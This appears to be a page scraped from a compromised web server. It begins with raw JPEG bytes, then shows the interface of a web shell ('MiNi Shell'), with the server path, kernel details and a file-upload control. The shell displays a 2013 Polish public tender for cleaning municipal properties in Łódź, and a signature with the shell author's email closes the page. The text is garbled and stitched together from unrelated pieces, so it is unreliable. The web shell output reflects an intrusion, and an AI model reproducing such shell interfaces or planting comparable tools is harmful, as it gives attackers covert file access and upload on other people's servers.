JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/70319-N-2013.html

<p class="kh_header"><b>Łódź: Sprzątanie nieruchomości administrowanych przez Zamawiającego</b><br>
<b>Numer ogłoszenia: 70319 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 6847601, faks 42 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschod.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie nieruchomości administrowanych przez Zamawiającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi związane z kompleksowym sprzątaniem - utrzymaniem w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych przynależnych do nieruchomości administrowanych przez Zamawiającego z podziałem na trzy (3) części, zwane zadaniami, stanowiące załączniki nr 1a, 1b, 1c, do niniejszej SIWZ: 
część I - zadanie nr 1 (zał. nr 1a do SIWZ ):    
pow. wew. nieruchomości - 4 439,00 m2, tereny zew. niezabudowane - 29 072,00  m2, tereny zielone -10 122,00 m2, ogółem:-43 633,00 m2;
część II - zadanie nr 2  (zał. nr 1b do SIWZ ):  
pow. wew. nieruchomości -5 273,00 m2,tereny zew. niezabudowane - 17 361,00 m2, tereny zielone -5 268,00 m2, ogółem:-27 902,00 m2;
część III - zadanie nr 3 (zał. nr 1c do SIWZ):  
pow. wew. nieruchomości - 31 189,00 m2, tereny zew. niezabudowane -65 868,00 m2, tereny zielone - 16 150,00 m2, ogółem:- 113 207,00 m2;w zakresie:
a) utrzymania w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych nieruchomości w tym:- biegi i podesty klatek schodowych, korytarze, wc-ogólne - codzienne (7 dni w tygodniu) sprzątanie wraz z usuwaniem kurzu i pajęczyn -  mycie jeden raz w tygodniu; - drzwi wejściowe do budynków - mycie jeden raz w miesiącu;- okna na klatkach schodowych, w pralniach i w suszarniach - mycie co sześć miesięcy (dwa razy w trakcie realizacji zamówienia - jeden raz przed świętami Bożego Narodzenia, jeden raz przed świętami Wielkanocnymi);
- pralnie i suszarnie - sprzątanie jeden raz w m-cu; - korytarze, strychy i piwnice - usuwanie odpadów wielkogabarytowych w miejsce składowania pojemników na odpady komunalne na nieruchomości - według potrzeb (częstotliwość i ilość gabarytów trudna do określenia uzależniona od prac remontowych wykonywanych przez najemców lokali). Zamawiający nie posiada  żadnych danych o usuniętych 
odpadach  wielkogabarytowych w latach ubiegłych; b) utrzymania w należytym stanie sanitarno-porządkowym terenów niezabudowanych przynależnych do nieruchomości w tym:- obszar chodników, studzienek ściekowych, dojść do budynków mieszkalnych i gospodarczych zbiorowego użytku komórek lokatorskich, pralni), garaży oraz  miejsc ustawienia pojemników na odpady komunalne i schodów pawilonów -  codzienne (7 dni w tygodniu) sprzątanie, a - w okresie zimowym -  codzienne (7 dni w tygodniu),  sukcesywne oraz  niezwłoczne usuwanie skutków zimy w systemie całodobowym: opadów śniegu i gołoledzi - częstotliwość i wielkość niemożliwa do określenia - uzależniona od  warunków atmosferycznych niezależnych od Zamawiającego (użyty piasek należy niezwłocznie usunąć po ustaniu gołoledzi - koszt zakupu i dostawy piasku do posypywania obciąża Wykonawcę -  ilość nie jest możliwa do określenia uzależniona od warunków atmosferycznych niezależnych od Zamawiającego); - gromadzenie zgarnianego śniegu w miejscach nie utrudniających prawidłową  komunikację pieszych wraz z wywozem  nagromadzonego (spryzmowanego) śniegu z wąskich chodników w miejsca wyznaczone przez Zamawiającego. Zamawiający zakazuje zgarniania śniegu, lodu, błota pośniegowego z chodnika lub z innych miejsc na jezdnię; - w przypadku ustawienia na powierzonym terenie pojemników na psie odchody umieszczania w nich toreb foliowych oraz opróżniania tych pojemników - wg  potrzeb (częstotliwość opróżniania  i ilość pojemników  nie jest możliwa do określenia - koszt zakupu toreb foliowych obciąża    Wykonawcę);
c) utrzymania w należytym stanie sanitarno-porządkowym terenów zielonych  przynależnych do nieruchomości w okresie wegetacji (od m-ca IV do m-ca X):
- sprzątanie śmieci - codzienne (7 dni w tygodniu);- przycinanie krzewów i żywopłotów- wg potrzeb;- pokos traw (koszenie) - jeden raz w miesiącu;
- grabienie skoszonej trawy, opadłych liści, usuwanie leżących gałezi wraz z ich wywozem i utylizacją przy użyciu własnego transportu i na koszt własny  do uzyskania czystości na terenach zielonych - sukcesywnie i niezwłocznie (częstotliwość i wielkość niemożliwa do określenia uzależniona od warunków atmosferycznych niezależnych od Zamawiającego). Zamawiający zastrzega, że wyżej wymienione odpady nie mogą być umieszczane w  pojemnikach na odpady komunalne ustawione w nieruchomościach, a także nie mogą  być pozostawione na terenie administrowanym przez Zamawiającego. - miejscowe usuwanie powstałych przedeptów poprzez dosiewanie trawy (wielkość trudna do określenia przez Zamawiającego, uzależniona od dokonanych zniszczeń przez przechodniów) - koszt 
zakupu nasiona trawy obciąża Wykonawcę; d) utrzymania w należytym stanie sanitarno-porządkowym terenów zielonych przynależnych do nieruchomości po okresie wegetacji (od m-ca XI do m-ca III):- sprzątanie śmieci - codziennie(7 dni w tygodniu);- grabienie opadłych liści, usuwanie leżących gałęzi wraz z ich wywozem i utylizacją  przy użyciu własnego transportu i na koszt  własny do uzyskania czystości na  terenach  zielonych - sukcesywnie i niezwłocznie (częstotliwość i wielkość  niemożliwa do określenia uzależniona od warunków atmosferycznych niezależnych  od Zamawiającego). Zamawiający zastrzega, że wyżej wymienione odpady nie mogą być  umieszczane w pojemnikach na odpady komunalne ustawione w nieruchomościach, a także nie mogą  być pozostawione na terenie administrowanym przez Zamawiającego; e) nadzorowania właściwego opróżniania pojemników na odpady komunalne, utrzymywania porządku w obrębie ustawienia pojemników, usuwania resztek śmieci powstałych podczas opróżniania tych 
pojemników oraz ich ustawiania w miejsca  wyznaczone, w tym także bieżące informowanie Zamawiającego  o uszkodzonych pojemnikach na odpady komunalne i ich przepełnieniu, a także nadzoru nad terminowym wywozem odpadów wielkogabarytowych złożonych w tych miejscach; f) zamieszczania ogłoszeń i informacji dla lokatorów w miejscach do tego wyznaczonych wraz z porządkowaniem tych miejsc - wg potrzeb; g) wymiany bieżącej  przepalonych żarówek wraz z uzupełnieniem brakujących żarówek w nieruchomościach - dotyczy pomieszczeń wspólnych nieruchomości - koszt zakupu żarówek obciąża Wykonawcę, (Zamawiający nie posiada żadnych danych o ilości wymienionych żarówek 
w latach ubiegłych);h) okolicznościowego wywieszania flag we wszystkich obsługiwanych nieruchomościach zabudowanych z bieżącym nadzorem (monitoringiem Wykonawcy) - zgodnie z wykazem świąt i rocznic, w których zachodzi obowiązek wywieszania flag, stanowiącym zał. nr 2 do niniejszej Specyfikacji jak również na każde dodatkowe żądanie Zamawiającego - koszt zakupu flag obciąża Wykonawcę. W przypadku brakujących lub niewłaściwych flag  np. z tytułu kradzieży lub 
uszkodzenia przez osoby trzecie np. zabrudzenia itp. - natychmiastowe ich uzupełnienie lub wymiana. Flagę narodową, miejską i papieską podnosi się nie wcześniej niż w dniu poprzedzającym święta i rocznice, a opuszcza się nie później niż w dniu bezpośrednio następującym po dniu, w  którym  przypada święto lub rocznica.
i)  usuwania na bieżąco plakatów i ogłoszeń z elewacji, drzwi wejściowych, prześwitów  bramowych, słupów oraz innych miejsc do tego nieprzeznaczonych;
j)  zgłaszania Zamawiającemu zaistniałych zagrożeń (np.nawisy śniegowe, sople lodowe, uszkodzenia instalacji elektrycznej, uszkodzenia elewacji zagrażające  bezpieczeństwu ludzi);k) wykonywania na żądanie Zamawiającego prac pomocniczych realizowanych przez pracownika Wykonawcy np. przenoszenie mebli na rzecz Zamawiającego - za  odrębnym zleceniem w terminie uzgodnionym przez Zamawiającego. Czynności wymienione w ust. 2 Wykonawca będzie wykonywał przy pomocy własnych pracowników i materiałów (piasek do posypywania chodników w okresie zimy, żarówki, torby foliowe, flagi, środki czystości do mycia, nasiona trawy), a także przy użyciu własnych narzędzi i sprzętu (łopaty do śniegu, urządzenia mechaniczne do odgarniania śniegu, odkuwacze do lodu, kosiarki, podkaszarki, grabie, sekatory, piły, miotły, szczotki, ścierki i tym podobne) oraz własnego transportu (samochód ciężarowy, ciągnik).
2. W ramach zamówienia Wykonawca zobowiązany będzie do wykonywania czynności objętych zamówieniem z opisaną powyżej częstotliwością, która winna gwarantować: 
a) odpowiedni stan sanitarno - porządkowy nieruchomości; 
b) odpowiedni stan bezpieczeństwa pożarowego nieruchomości (opróżnianie strychów, korytarzy i piwnic z przedmiotów stwarzających zagrożenie);
c) odpowiedni stan porządkowy terenów niezabudowanych przynależnych do nieruchomości - także w zakresie zabezpieczenia od skutków oblodzeń i opadów śniegu (w okresie zimowym Zamawiający będzie wymagał natychmiastowego przystąpienia do usuwania skutków zimy w przypadku zaistnienia intensywnych opadów śniegu lub wystąpienia gołoledzi);
d) odpowiedni stan porządkowy terenów zielonych przynależnych do nieruchomości. 
3. Wykonawca przejmuje na siebie obowiązki i odpowiedzialność za  utrzymanie w  należytym stanie sanitarno - porządkowym powierzonego terenu nieruchomości  i terenów przynależnych do nieruchomości niezabudowanych oraz zielonych w  rozumieniu Ustawy z dnia 13.09.1996 r. (Dz.U. z 1996 r. Nr 132 poz. 622 z późniejszymi zmianami) oraz Uchwały Rady Miejskiej w Łodzi Nr LXII/1159/06  z dnia 01.02.2006 r. z późniejszymi zmianami, O utrzymaniu czystości i porządku w gminach, w tym także odpowiedzialność za wykroczenia  uregulowane w przepisach karnych.                                                                                
4. Wykonawca zobowiązany jest do posiadania aktualnej umowy ze składowiskiem odpadów zielonych - kompostownią..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu określonego w art. 22 ust. 1 Ustawy, który dotyczy:
a) posiadania wiedzy i doświadczenia;
Zamawiający żąda od Wykonawcy wykazania w zał. nr 5 do SIWZ, wykonanych i wykonywanych usług w okresie ostatnich trzech lat  przed upływem terminu  składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  oraz załączeniem dokumentów potwierdzających, że wykazane usługi zostały wykonane lub są 
wykonywane należycie w następujących ilościach: 
- dla części I (zadania nr 1), co najmniej jednej usługi w okresie 12 miesięcy na kwotę (brutto) minimum 100 000,00 zł.,
- dla części II (zadania nr 2), co najmniej jednej usługi w okresie 12 miesięcy na kwotę (brutto) minimum  60 000,00 zł.,
- dla części III (zadania nr 3), co najmniej jednej usługi w okresie 12 miesięcy na kwotę (brutto) minimum 250 000,00 zł.
W przypadku składania oferty na wszystkie trzy części ( zadania ) co najmniej trzech usług w okresie 12 miesięcy na kwotę łączną (brutto) minimum 410 000,00 zł. 
Dla usług będących w trakcie realizacji należy załączyć oświadczenie o podpisanej umowie z informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie może być niższa niż kwoty określone powyżej.
Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu, określonego w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania potencjałem technicznym;
Zamawiający żąda od Wykonawcy wykazania w zał. nr 6 do SIWZ, posiadanego potencjału technicznego, którym będzie dysponował realizując zamówienie, które zapewni utrzymanie należytego stanu sanitarno - porządkowego nieruchomości i terenów niezabudowanych oraz zielonych przynależnych do nieruchomości w następujących ilościach, dla każdej części postępowania (zadania):
- minimum pięć kosiarek spalinowych, - minimum trzy podkaszarki, - minimum jedną odśnieżarkę mechaniczną lub pojazd przystosowany do odgarniania śniegu z chodników i placów utwardzonych oraz - co najmniej jeden samochód ciężarowy o ładowności powyżej (0,9 t.)  lub jeden ciągnik rolniczy z przyczepą.
Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych  przez Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu określonego w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania osobami zdolnymi do wykonania zamówienia;
Zamawiający żąda od Wykonawcy wykazu osób uczestniczących w realizacji zamówienia  - oświadczenia - (zał. nr 7 do SIWZ), że dla zapewnienia utrzymania należytego stanu sanitarno - porządkowego nieruchomości i terenów przynależnych  do nieruchomości niezabudowanych oraz zielonych, będzie dysponował dla wybranych części postępowania (zadań) następującą ilością osób:  
 - dla części I (zadania nr 1) - minimum 10 osobami, - dla części II (zadania nr 2) - minimum 8 osobami, - dla części III (zadania nr 3) - minimum 20 osobami.
Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu określonego w art. 22 ust. 1 Ustawy, który dotyczy:
a) sytuacji ekonomicznej i finansowej;
Zamawiający żąda od Wykonawcy wykazania, że  posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z usługą sprzątania na sumę ubezpieczenia nie mniej niż 400 000,00 zł., niezależnie od ilości części (zadań), do których przystępuje Wykonawca.   
Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez Wykonawców dokumentów i oświadczeń, na zasadzie: (spełnia/ nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>dokumentów dotyczących w szczególności: zakresu dostępnych Wykonawcy zasobów innego podmiotu;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> A.N.Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 4, w cenie 20,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 10:00, miejsce: A.N.Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com